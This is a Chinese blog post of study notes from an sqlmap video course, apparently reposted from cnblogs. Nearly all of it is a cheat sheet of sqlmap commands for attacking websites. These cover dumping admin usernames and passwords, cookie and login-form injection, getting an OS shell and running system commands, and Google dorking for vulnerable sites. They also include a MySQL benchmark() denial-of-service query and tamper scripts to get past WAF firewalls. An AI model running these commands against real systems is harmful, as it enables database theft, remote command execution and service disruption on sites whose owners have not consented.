码迷,mamicode.com
首页 > 数据库 > 详细

羽翼sqlmap视频笔记

时间:2016-08-06 17:14:31      阅读:189      评论:0      收藏:0      [点我收藏+]

标签:

access 注入

./sqlmap.py -u "url"          注入判断
./sqlmap.py -u "url" --tables  跑表
./sqlmap.py -u "url" --columns -T admin  猜解字段
./sqlmap.py -u "url" --dump -T admin -C "username,password"



mysql系列课程
sqlmap -u "url" --dbs  获取数据库
sqlmap -u "url" -D myslibrary --tables   获取数据库中的表    这里是猜解爆破数据
sqlmap -u "url" -D myslibrary --T hy_admin --columns 爆列名
sqlmap -u "url" -D myslibrary --T hy_admin -C id,user,password --dump  获取字段内容


cookie注入
sqlmap -u "url" --cookie "id=9" --table --level 2   cookie注入
sqlmap -u "url" --cookie "id=9" --columns  -T admin --level 2 爆表
sqlmap -u "url" --cookie "id=9" --dump -T admin -C "username,password" --level 2

post登陆框注入
自动搜索表单
sqlmap -u "url" --forms   自动注入
sqlmap -u "url" --data "参数"  指定参数注入

交互写shell 及命令执行
sqlmap -u "url" --os-cmd=ipconfig
sqlmap -u "url" --os-shell   获取shell


伪静态注入
sqlmap -u "url?id=54*.html" --dbs    在注入的地方放一个*字键 然后进行注入
sqlmap -u "url?id=54*.html" -D preem --tables 获取表
sqlmap -u "url?id=54*.html" -D preem -T pe_user --columns  得到列
sqlmap -u "url?id=54*.html" -D preem -T pe_user --C password
sqlmap -u "url?id=54*.html" -D preem -T pe_user --C password --dump


请求延时   绕过网站的一些防护
sqlmap --dbs -u "url/40*.html" --delay 1    根据1秒来获取
sqlmap --dbs -u "url/40*.html" --safe-freq 2   2次请求之后访问一个正确界面


来把google
sqlmap -g inurl:php?id=1


mysql dos攻击
sqlmap -u "url" --sql-shell   首先获取shell
select benchmark(999999999999,0x70726f626e646f70726f62616e646f70726f62616e646ff)


绕过waf防火墙
sqlmap -u "url" -v 3 --dbs --batch --tamper "charencode.py"   可以绕过一些过滤进行注入
sqlmap -u "url" --privileges 查看当前用户权限

羽翼sqlmap视频笔记

标签:

原文地址:http://www.cnblogs.com/haha520/p/5744272.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!